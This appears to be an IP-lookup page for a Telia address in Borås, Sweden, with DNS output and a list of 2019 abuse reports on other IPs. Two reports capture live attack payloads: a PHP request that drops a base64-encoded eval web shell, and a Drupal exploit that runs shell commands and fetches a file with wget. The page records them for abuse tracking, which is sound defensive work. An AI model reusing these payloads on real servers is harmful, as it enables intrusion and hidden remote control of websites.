Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: Borås

Region: Västra Götaland

Country: Sweden

Internet Service Provider: Telia

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 217.211.157.132
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 65517
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;217.211.157.132.		IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025010602 1800 900 604800 86400

;; Query time: 63 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Jan 07 11:52:05 CST 2025
;; MSG SIZE  rcvd: 108
Host info
132.157.211.217.in-addr.arpa domain name pointer 217-211-157-132-no2670.digitaltv.telia.com.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
132.157.211.217.in-addr.arpa	name = 217-211-157-132-no2670.digitaltv.telia.com.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
179.99.171.84 attack
Request: "GET / HTTP/1.1"
2019-06-22 06:02:33
206.108.51.194 attackspambots
SSH Brute-Force attacks
2019-06-22 05:57:05
109.201.152.23 attackbotsspam
Bad Bot Request: "HEAD / HTTP/1.1" Agent: "Mozilla/5.0 (compatible; Uptimebot/1.0;  http://www.uptime.com/uptimebot)"
2019-06-22 06:21:24
107.152.36.157 attackbots
Phishing url: https://www.account-verify-account.com/
2019-06-22 06:05:25
103.90.205.41 attack
Request: "GET / HTTP/1.1"
2019-06-22 06:08:57
43.225.193.202 attackspambots
445/tcp
[2019-06-21]1pkt
2019-06-22 06:32:52
54.207.33.42 attack
Request: "GET / HTTP/1.1"
2019-06-22 06:03:28
62.210.249.242 attack
Request: "GET /webconfig.txt.php HTTP/1.1" Request: "GET ///webconfig.txt.php HTTP/1.1" Request: "GET ///webconfig.txt.php HTTP/1.1" Request: "GET /webconfig.txt.php HTTP/1.1" Request: "GET /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-'; HTTP/1.1" Request: "GET //webconfig.txt.php HTTP/1.1" Request: "GET //webconfig.txt.php HTTP/1.1" Request: "GET /webconfig.txt.php HTTP/1.1" Request: "GET ///webconfig.txt.php HTTP/1.1" Request: "GET ///webconfig.txt.php HTTP/1.1" Request: "GET /webconfig.txt.php HTTP/1.1" Request: "POST /wp-admin/admin-post.php?page=wysija_campaignsaction=themes HTTP/1.1" Request: "POST /wp-admin/admin-post.php HTTP/1.1" Request: "GET /admin/images/cal_date_over.gif HTTP/1.1" Request: "GET /admin/images/cal_date_over.gif HTTP/1.1" Request: "GET /admin/login.php HTTP/1.1" Request: "GET /admin/login.php HTTP/1.1" Requ
2019-06-22 06:15:37
144.217.22.128 attackspambots
Request: "POST /?q=user/passwordname[#post_render][]=passthruname[#type]=markupname[#markup]=echo 'Vuln!! patch it Now!' > vuln.htm; echo 'Vuln!!'> sites/default/files/vuln.php; echo 'Vuln!!'> vuln.php; cd sites/default/files/; echo 'AddType application/x-httpd-php .jpg' > .htaccess; wget 'https://www.stiilus.com/sites/default/files/vuln.php' HTTP/1.1"
2019-06-22 06:26:27
95.219.252.231 attack
445/tcp
[2019-06-21]1pkt
2019-06-22 06:07:21
185.48.148.183 attack
445/tcp
[2019-06-21]1pkt
2019-06-22 06:06:33
185.53.88.45 attackbotsspam
\[2019-06-21 18:05:45\] SECURITY\[2312\] res_security_log.c: SecurityEvent="FailedACL",EventTV="2019-06-21T18:05:45.889-0400",Severity="Error",Service="SIP",EventVersion="1",AccountID="9011441217900519",SessionID="0x7fea9c06a3e8",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/185.53.88.45/51470",ACLName="no_extension_match"
\[2019-06-21 18:07:25\] SECURITY\[2312\] res_security_log.c: SecurityEvent="FailedACL",EventTV="2019-06-21T18:07:25.163-0400",Severity="Error",Service="SIP",EventVersion="1",AccountID="9441217900519",SessionID="0x7fea9c16c048",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/185.53.88.45/57977",ACLName="no_extension_match"
\[2019-06-21 18:09:00\] SECURITY\[2312\] res_security_log.c: SecurityEvent="FailedACL",EventTV="2019-06-21T18:09:00.529-0400",Severity="Error",Service="SIP",EventVersion="1",AccountID="011441217900519",SessionID="0x7fea9c3653e8",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/185.53.88.45/55604",ACLName="no_extensi
2019-06-22 06:20:30
80.211.3.109 attackbots
22/tcp
[2019-06-21]1pkt
2019-06-22 06:10:13
190.11.225.59 attack
Request: "GET / HTTP/1.1"
2019-06-22 06:04:23
125.27.54.37 attackbotsspam
445/tcp
[2019-06-21]1pkt
2019-06-22 06:11:07

Recently Reported IPs

129.195.183.50 147.133.186.136 245.102.45.137 182.183.235.21
56.144.21.58 35.146.150.248 231.13.85.218 234.232.113.104
182.12.144.42 156.98.120.155 146.120.130.61 206.82.20.193
235.8.102.52 243.82.28.40 243.66.57.150 18.223.158.23
143.155.249.101 229.160.45.238 66.171.107.5 45.180.65.50